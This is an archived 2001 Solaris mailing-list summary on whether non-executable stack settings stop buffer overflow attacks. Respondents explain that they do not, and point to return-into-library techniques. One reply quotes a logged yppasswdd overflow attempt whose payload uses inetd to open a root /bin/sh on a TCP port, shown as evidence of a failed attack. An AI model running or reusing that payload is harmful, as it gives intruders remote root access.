The Answer is NO. Thanx to Justin Stringfellow (Sun Micro) for a Sun Doc. The doc explains the protection, but not the remaining vulnerabilities. =============================================================== Thanx to Kennie Gutierrez, With this setting you will not be totally protected, but for instance we have recorded three differents attacks to exploit a buffer overflow on the yppasswdd rpc service, they killed the process but could not do anything else. Here I include an excerpt of the log file: yppasswdd[235]: [ID 467562 auth.error] yppasswdd: user @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@L@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@ P" `"?-"?-"?-"? ; /bin/sh-c echo 'rje stream tcp nowait root /bin/sh sh -i'>z;/usr/sbin/inetd -s z;rm z;: does not exist Thanks to those two setting we were safe. > Is there any other system settings that would improve security? There are various kernel setting related to TCP/IP to improve system security. ====================================================== Thanx to Ice for http://security-archive.merton.ox.ac.uk/bugtraq-199903/0004.html ====================================================== Thanx to John Leadeham for There is a whole slew of online blueprints about security. See http://www.sun.com/blueprints/online.html ====================================================== Thanx to Brett Lymn for In short, no. They make things more difficult because code cannot be executed on the stack directly but it does not prevent the attacker constructing call frames to library calls and jumping into the library call. A few calls and they have allocated some memory to run code in and jumped to it. _Johan Johan Hartzenberg, UNIX Systems programmer, CSC Computer Sciences (South Africa) Pty Ltd Tel: +27 (21) 509 4621 or 083 6808398 Fax: 021 509 4677 = e-mail = jhartzen@csc.comReceived on Tue Jun 19 17:22:19 2001
This archive was generated by hypermail 2.1.8 : Wed Mar 23 2016 - 16:24:57 EDT